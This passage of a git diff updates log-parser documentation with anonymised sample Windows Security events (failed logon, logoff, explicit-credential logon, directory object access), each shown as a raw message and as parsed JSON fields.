"fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" ], "mac": [ - "00-00-00-00-00-00-00-E0", - "00-11-22-33-44-55" + "00-00-00-00-00-00-00-00", + "11-11-11-11-11-11", + "A0-B1-C2-D3-E4-F5", + "AA-BB-CC-DD-EE-FF" ], - "name": "HOST01", + "name": "hostname", "os": { - "build": "14393.6351", + "build": "14393.7428", "family": "windows", - "kernel": "10.0.14393.6343 (rs1_release.230913-1727)", - "name": "Windows Server 2016 Standard", + "kernel": "10.0.14393.7426 (rs1_release.240926-1524)", + "name": "Windows Server 2016 Datacenter", "platform": "windows", "type": "windows", "version": "10.0" 
@@ -1813,63 +1975,99 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "level": "information" }, "process": { - "executable": "D:\\\\Program Files (x86)\\\\Process\\\\Test\\\\processname.exe", - "name": "processname.exe", - "pid": 33556 + "executable": "C:\\Windows\\System32\\executable.exe", + "name": "executable.exe", + "pid": 824 }, "related": { "hosts": [ - "HOST01" + "WORKSTATION", + "hostname" ], "ip": [ "1.2.3.4", - "8.8.8.8", - "fe80::abcd:123:456" - ], - "user": [ - "account" + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "Channel" + } + }, + "client": { + "name": "WORKSTATION", + "os": { + "type": "windows" + } + }, + "server": { + "name": "hostname", + "os": { + "type": "windows" + } + } + }, + "server": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" ] }, "source": { - "address": "8.8.8.8", - "ip": "8.8.8.8", - "port": 12345 + "address": "WORKSTATION", + "domain": "WORKSTATION", + "port": 0 }, "user": { - "domain": "company", - "effective": { - "domain": "company", - "name": "account" - }, "id": "S-1-2-3", - "name": "account", + "name": "WORKSTATION$", "target": { - "domain": "company", - "name": "account" + "id": "S-1-0-0" } }, "winlog": { - "activity_id": "{7e156dc4-0d77-0008-c56d-157e770dda01}", + "activity_id": "{12345678-abcd-efab-cdef-123456789012}", "api": "wineventlog", "channel": "Security", - "computer_name": "HOST01.company.com", - "event_id": "4648", + "computer_name": "WORKSTATION.johndoe.com", + "event_id": "4625", "keywords": [ - "Audit Success" + "Audit Failure" ], "logon": { - "id": "0x41c1b034b" + "failure": { + "reason": 
"Unknown user name or bad password.", + "status": "This is either due to a bad username or authentication information", + "sub_status": "User logon with misspelled or bad user account" + }, + "id": "0x3e7", + "type": "Network" }, "opcode": "Info", "process": { - "pid": 848, + "pid": 824, "thread": { - "id": 22916 + "id": 28936 } }, "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", "provider_name": "Microsoft-Windows-Security-Auditing", - "record_id": "8500947825", + "record_id": "2552812283", "task": "Logon" } } 
@@ -1877,66 +2075,57 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "security_event_4688.json" +=== "security_event_4634.json" ```json { - "message": "{\"tags\": [\"beats_input_codec_plain_applied\"], \"event\": {\"original\": \"A new process has been created.\\\\n\\\\nCreator Subject:\\\\n\\\\tSecurity ID:\\\\t\\\\tS-1-1-1\\\\n\\\\tAccount Name:\\\\t\\\\tHOST01$\\\\n\\\\tAccount Domain:\\\\t\\\\tCOMPANY\\\\n\\\\tLogon ID:\\\\t\\\\t0x3E7\\\\n\\\\nTarget Subject:\\\\n\\\\tSecurity ID:\\\\t\\\\tS-1-0-0\\\\n\\\\tAccount Name:\\\\t\\\\t-\\\\n\\\\tAccount Domain:\\\\t\\\\t-\\\\n\\\\tLogon ID:\\\\t\\\\t0x0\\\\n\\\\nProcess Information:\\\\n\\\\tNew Process ID:\\\\t\\\\t0x1d9c\\\\n\\\\tNew Process Name:\\\\tC:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\\\\n\\\\tToken Elevation Type:\\\\tTokenElevationTypeDefault (1)\\\\n\\\\tMandatory Label:\\\\t\\\\tS-1-2-3\\\\n\\\\tCreator Process ID:\\\\t0x2a0\\\\n\\\\tCreator Process Name:\\\\tC:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\services.exe\\\\n\\\\tProcess Command Line:\\\\tC:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\\\\n\\\\nToken Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.\\\\n\\\\nType 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\\\\n\\\\nType 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. 
An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\\\\n\\\\nType 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.\", \"action\": \"Process Creation\", \"kind\": \"event\", \"outcome\": \"success\", \"created\": \"2023-11-09T08:43:52.407Z\", \"provider\": \"Microsoft-Windows-Security-Auditing\", \"code\": \"4688\"}, \"@version\": \"1\", \"@timestamp\": \"2023-11-09T08:43:51.462Z\", \"message\": \"A new process has been created.\\\\n\\\\nCreator Subject:\\\\n\\\\tSecurity ID:\\\\t\\\\tS-1-1-1\\\\n\\\\tAccount Name:\\\\t\\\\tHOST01$\\\\n\\\\tAccount Domain:\\\\t\\\\tCOMPANY\\\\n\\\\tLogon ID:\\\\t\\\\t0x3E7\\\\n\\\\nTarget Subject:\\\\n\\\\tSecurity ID:\\\\t\\\\tS-1-0-0\\\\n\\\\tAccount Name:\\\\t\\\\t-\\\\n\\\\tAccount Domain:\\\\t\\\\t-\\\\n\\\\tLogon ID:\\\\t\\\\t0x0\\\\n\\\\nProcess Information:\\\\n\\\\tNew Process ID:\\\\t\\\\t0x1d9c\\\\n\\\\tNew Process Name:\\\\tC:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\\\\n\\\\tToken Elevation Type:\\\\tTokenElevationTypeDefault (1)\\\\n\\\\tMandatory Label:\\\\t\\\\tS-1-2-3\\\\n\\\\tCreator Process ID:\\\\t0x2a0\\\\n\\\\tCreator Process Name:\\\\tC:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\services.exe\\\\n\\\\tProcess Command Line:\\\\tC:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\\\\n\\\\nToken Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.\\\\n\\\\nType 1 is a full token with no privileges removed or groups disabled. 
A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\\\\n\\\\nType 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\\\\n\\\\nType 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.\", \"winlog\": {\"computer_name\": \"HOST01.company.test\", \"provider_name\": \"Microsoft-Windows-Security-Auditing\", \"channel\": \"Security\", \"provider_guid\": \"{54849625-5478-4994-a5ba-3e3b0328c30d}\", \"keywords\": [\"Audit Success\"], \"version\": 2, \"event_id\": \"4688\", \"process\": {\"pid\": 4, \"thread\": {\"id\": 17028}}, \"task\": \"Process Creation\", \"event_data\": {\"ParentProcessName\": \"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\services.exe\", \"TokenElevationType\": \"%%1936\", \"MandatoryLabel\": \"S-1-2-3\", \"TargetUserSid\": \"S-1-0-0\", \"SubjectUserSid\": \"S-1-1-1\", \"SubjectDomainName\": \"COMPANY\", \"SubjectLogonId\": \"0x3e7\", \"CommandLine\": \"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\", \"NewProcessId\": \"0x1d9c\", \"TargetDomainName\": \"-\", \"ProcessId\": \"0x2a0\", \"SubjectUserName\": \"HOST01$\", \"TargetUserName\": \"-\", \"NewProcessName\": \"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\", \"TargetLogonId\": \"0x0\"}, \"record_id\": 8884538, \"api\": \"wineventlog\", \"opcode\": \"Info\"}, \"host\": {\"hostname\": 
\"host01\", \"id\": \"abcdefgh-1234-5678-abcd-efgh12345678\", \"ip\": [\"8.8.8.8\"], \"name\": \"host01\", \"mac\": [\"00-11-22-33-44-55\"], \"architecture\": \"x86_64\", \"os\": {\"build\": \"20348.2031\", \"version\": \"10.0\", \"name\": \"Windows Server 2022 Standard\", \"family\": \"windows\", \"kernel\": \"10.0.20348.2031 (WinBuild.160101.0800)\", \"type\": \"windows\", \"platform\": \"windows\"}}, \"log\": {\"level\": \"information\"}, \"ecs\": {\"version\": \"8.0.0\"}, \"agent\": {\"type\": \"winlogbeat\", \"ephemeral_id\": \"7ecf606a-ee47-4796-a223-4e6bb827233d\", \"id\": \"65ede6f4-4783-4792-8dc0-8364bc33b7bd\", \"version\": \"8.10.4\", \"name\": \"HOST01\"}}", + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. 
Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", "event": { - "action": "Process Creation", - "code": "4688", + "action": "Logoff", + "code": "4634", "kind": "event", "module": "security", - "original": "A new process has been created.\\n\\nCreator Subject:\\n\\tSecurity ID:\\t\\tS-1-1-1\\n\\tAccount Name:\\t\\tHOST01$\\n\\tAccount Domain:\\t\\tCOMPANY\\n\\tLogon ID:\\t\\t0x3E7\\n\\nTarget Subject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount 
Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nProcess Information:\\n\\tNew Process ID:\\t\\t0x1d9c\\n\\tNew Process Name:\\tC:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\\n\\tToken Elevation Type:\\tTokenElevationTypeDefault (1)\\n\\tMandatory Label:\\t\\tS-1-2-3\\n\\tCreator Process ID:\\t0x2a0\\n\\tCreator Process Name:\\tC:\\\\Windows\\\\System32\\\\services.exe\\n\\tProcess Command Line:\\tC:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\\n\\nToken Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.\\n\\nType 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\\n\\nType 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\\n\\nType 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.", + "original": "An account was logged off.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tJ_DOE\n\tLogon ID:\t\t0x5ED35BB6\n\nLogon Type:\t\t\t3\n\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. 
Logon IDs are only unique between reboots on the same computer.", "outcome": "success", "provider": "Microsoft-Windows-Security-Auditing" }, - "@timestamp": "2023-11-09T08:43:51.462000Z", + "@timestamp": "2024-11-12T08:42:47.895000Z", "action": { - "id": 4688, + "id": 4634, "outcome": "success", "properties": { - "CommandLine": "C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe", - "MandatoryLabel": "S-1-2-3", - "NewProcessId": "0x1d9c", - "NewProcessName": "C:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe", - "ParentProcessName": "C:\\\\Windows\\\\System32\\\\services.exe", - "ProcessId": "0x2a0", - "SubjectDomainName": "COMPANY", - "SubjectLogonId": "0x3e7", - "SubjectUserName": "HOST01$", - "SubjectUserSid": "S-1-1-1", - "TargetDomainName": "-", - "TargetLogonId": "0x0", - "TargetUserName": "-", - "TargetUserSid": "S-1-0-0", - "TokenElevationType": "%%1936" + "LogonType": "3", + "TargetDomainName": "J_DOE", + "TargetLogonId": "0x5ed35bb6", + "TargetUserName": "ACCOUNT", + "TargetUserSid": "S-1-2-3" } }, "agent": { - "ephemeral_id": "7ecf606a-ee47-4796-a223-4e6bb827233d", - "id": "65ede6f4-4783-4792-8dc0-8364bc33b7bd", - "name": "HOST01", - "type": "winlogbeat", - "version": "8.10.4" + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" }, "host": { "architecture": "x86_64", - "hostname": "host01", - "id": "abcdefgh-1234-5678-abcd-efgh12345678", + "hostname": "pc01", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", "ip": [ - "8.8.8.8" + "1.2.3.4", + "5.6.7.8" ], "mac": [ "00-11-22-33-44-55" ], - "name": "host01", + "name": "pc01", "os": { - "build": "20348.2031", + "build": "17763.6414", "family": "windows", - "kernel": "10.0.20348.2031 (WinBuild.160101.0800)", - "name": "Windows Server 2022 Standard", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", "platform": "windows", "type": "windows", "version": 
"10.0" 
@@ -1945,65 +2134,1113 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "log": { "level": "information" }, - "process": { - "command_line": "C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe", - "executable": "C:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe", - "name": "WmiApSrv.exe", - "parent": { - "executable": "C:\\\\Windows\\\\System32\\\\services.exe", - "name": "services.exe", - "pid": 672 - }, - "pid": 7580 - }, "related": { - "hosts": [ - "host01" - ], - "ip": [ - "8.8.8.8" - ], + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "ACCOUNT" + ] + }, + "user": { + "domain": "J_DOE", + "id": "S-1-2-3", + "name": "ACCOUNT", + "target": { + "domain": "J_DOE", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.jdoe.com", + "event_id": "4634", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x5ed35bb6", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 704, + "thread": { + "id": 6336 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "15983780774", + "task": "Logoff" + } + } + + ``` + + +=== "security_event_4648.json" + + ```json + + { + "message": "{\"log\": {\"level\": \"information\"}, \"message\": \"A logon was attempted using explicit credentials.\\\\n\\\\nSubject:\\\\n\\\\tSecurity ID:\\\\t\\\\tS-1-2-3\\\\n\\\\tAccount Name:\\\\t\\\\tSYSTEM\\\\n\\\\tAccount Domain:\\\\t\\\\tDOMAIN\\\\n\\\\tLogon ID:\\\\t\\\\t0x41C1B034B\\\\n\\\\tLogon GUID:\\\\t\\\\t{00000000-0000-0000-0000-000000000000}\\\\n\\\\nAccount Whose Credentials Were Used:\\\\n\\\\tAccount Name:\\\\t\\\\taccount\\\\n\\\\tAccount Domain:\\\\t\\\\tcompany\\\\n\\\\tLogon GUID:\\\\t\\\\t{00000000-0000-0000-0000-000000000000}\\\\n\\\\nTarget Server:\\\\n\\\\tTarget Server Name:\\\\tTARGET.company.com\\\\n\\\\tAdditional 
Information:\\\\tTARGET.company.com\\\\n\\\\nProcess Information:\\\\n\\\\tProcess ID:\\\\t\\\\t0x8314\\\\n\\\\tProcess Name:\\\\t\\\\tD:\\\\\\\\Program Files (x86)\\\\\\\\Process\\\\\\\\Test\\\\\\\\processname.exe\\\\n\\\\nNetwork Information:\\\\n\\\\tNetwork Address:\\\\t8.8.8.8\\\\n\\\\tPort:\\\\t\\\\t\\\\t12345\\\\n\\\\nThis event is generated when a process attempts to log on an account by explicitly specifying that account\\\\u2019s credentials. This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.\", \"type\": \"R2\", \"fields\": {\"gdp-indice\": \"l-serve\", \"gdp-parc\": \"defaut\", \"gdp-config\": \"server\", \"gdp-version-sysmon\": 15, \"gdp-sousparc\": \"prod\", \"gdp-version\": \"2.8\", \"gdp-version-winlogbeat\": 3.4}, \"ecs\": {\"version\": \"8.0.0\"}, \"agent\": {\"name\": \"WB-SRV-HOST01\", \"type\": \"winlogbeat\", \"version\": \"8.8.2\", \"ephemeral_id\": \"06ad3222-a4be-4b59-9958-5f9a657ea9f1\", \"id\": \"2c0cd63b-3836-4620-9eb8-13202bd370a3\"}, \"fields.gdp-redis\": \"2\", \"event\": {\"provider\": \"Microsoft-Windows-Security-Auditing\", \"kind\": \"event\", \"code\": \"4648\", \"action\": \"Logon\", \"created\": \"2023-11-09T09:05:15.197Z\", \"outcome\": \"success\"}, \"winlog\": {\"event_id\": \"4648\", \"keywords\": [\"Audit Success\"], \"provider_guid\": \"{54849625-5478-4994-A5BA-3E3B0328C30D}\", \"event_data\": {\"SubjectUserName\": \"SYSTEM\", \"IpPort\": \"12345\", \"TargetInfo\": \"TARGET.company.com\", \"TargetLogonGuid\": \"{00000000-0000-0000-0000-000000000000}\", \"TargetUserName\": \"account\", \"TargetServerName\": \"TARGET.company.com\", \"ProcessName\": \"D:\\\\\\\\Program Files (x86)\\\\\\\\Process\\\\\\\\Test\\\\\\\\processname.exe\", \"SubjectUserSid\": \"S-1-2-3\", \"IpAddress\": \"8.8.8.8\", \"TargetDomainName\": \"company\", \"SubjectDomainName\": \"DOMAIN\", \"ProcessId\": \"0x8314\", \"LogonGuid\": \"{00000000-0000-0000-0000-000000000000}\", 
\"SubjectLogonId\": \"0x41c1b034b\"}, \"process\": {\"pid\": 848, \"thread\": {\"id\": 22916}}, \"provider_name\": \"Microsoft-Windows-Security-Auditing\", \"computer_name\": \"HOST01.company.com\", \"opcode\": \"Info\", \"task\": \"Logon\", \"channel\": \"Security\", \"api\": \"wineventlog\", \"record_id\": 8500947825, \"activity_id\": \"{7E156DC4-0D77-0008-C56D-157E770DDA01}\"}, \"@timestamp\": \"2023-11-09T09:05:14.415Z\", \"host\": {\"name\": \"HOST01\", \"id\": \"abcdefgh-1234-5678-abcd-efgh12345678\", \"mac\": [\"00-00-00-00-00-00-00-E0\", \"00-11-22-33-44-55\"], \"architecture\": \"x86_64\", \"os\": {\"platform\": \"windows\", \"version\": \"10.0\", \"name\": \"Windows Server 2016 Standard\", \"build\": \"14393.6351\", \"kernel\": \"10.0.14393.6343 (rs1_release.230913-1727)\", \"type\": \"windows\", \"family\": \"windows\"}, \"hostname\": \"HOST01\", \"ip\": [\"1.2.3.4\", \"fe80::abcd:123:456\"]}, \"event_ingest_logstash\": \"2023-11-09T09:05:14.912238Z\", \"fields.gdp-logstash\": \"5\", \"@version\": \"1\"}", + "event": { + "action": "Logon", + "code": "4648", + "kind": "event", + "module": "security", + "original": "A logon was attempted using explicit credentials.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tSYSTEM\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x41C1B034B\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nAccount Whose Credentials Were Used:\\n\\tAccount Name:\\t\\taccount\\n\\tAccount Domain:\\t\\tcompany\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nTarget Server:\\n\\tTarget Server Name:\\tTARGET.company.com\\n\\tAdditional Information:\\tTARGET.company.com\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x8314\\n\\tProcess Name:\\t\\tD:\\\\Program Files (x86)\\\\Process\\\\Test\\\\processname.exe\\n\\nNetwork Information:\\n\\tNetwork Address:\\t8.8.8.8\\n\\tPort:\\t\\t\\t12345\\n\\nThis event is generated when a process attempts to log on an account by explicitly 
specifying that account\\u2019s credentials. This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2023-11-09T09:05:14.415000Z", + "action": { + "id": 4648, + "outcome": "success", + "properties": { + "IpAddress": "8.8.8.8", + "IpPort": "12345", + "LogonGuid": "{00000000-0000-0000-0000-000000000000}", + "ProcessId": "0x8314", + "ProcessName": "D:\\\\Program Files (x86)\\\\Process\\\\Test\\\\processname.exe", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x41c1b034b", + "SubjectUserName": "SYSTEM", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "company", + "TargetInfo": "TARGET.company.com", + "TargetLogonGuid": "{00000000-0000-0000-0000-000000000000}", + "TargetServerName": "TARGET.company.com", + "TargetUserName": "account" + } + }, + "agent": { + "ephemeral_id": "06ad3222-a4be-4b59-9958-5f9a657ea9f1", + "id": "2c0cd63b-3836-4620-9eb8-13202bd370a3", + "name": "WB-SRV-HOST01", + "type": "winlogbeat", + "version": "8.8.2" + }, + "host": { + "architecture": "x86_64", + "hostname": "HOST01", + "id": "abcdefgh-1234-5678-abcd-efgh12345678", + "ip": [ + "1.2.3.4", + "fe80::abcd:123:456" + ], + "mac": [ + "00-00-00-00-00-00-00-E0", + "00-11-22-33-44-55" + ], + "name": "HOST01", + "os": { + "build": "14393.6351", + "family": "windows", + "kernel": "10.0.14393.6343 (rs1_release.230913-1727)", + "name": "Windows Server 2016 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "process": { + "executable": "D:\\\\Program Files (x86)\\\\Process\\\\Test\\\\processname.exe", + "name": "processname.exe", + "pid": 33556 + }, + "related": { + "hosts": [ + "HOST01" + ], + "ip": [ + "1.2.3.4", + "8.8.8.8", + "fe80::abcd:123:456" + ], + "user": [ + "account" + ] + }, + "source": { + "address": "8.8.8.8", + "ip": "8.8.8.8", + "port": 12345 + 
}, + "user": { + "domain": "company", + "effective": { + "domain": "company", + "name": "account" + }, + "id": "S-1-2-3", + "name": "account", + "target": { + "domain": "company", + "name": "account" + } + }, + "winlog": { + "activity_id": "{7e156dc4-0d77-0008-c56d-157e770dda01}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.company.com", + "event_id": "4648", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x41c1b034b" + }, + "opcode": "Info", + "process": { + "pid": 848, + "thread": { + "id": 22916 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "8500947825", + "task": "Logon" + } + } + + ``` + + +=== "security_event_4662.json" + + ```json + + { + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service 
Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 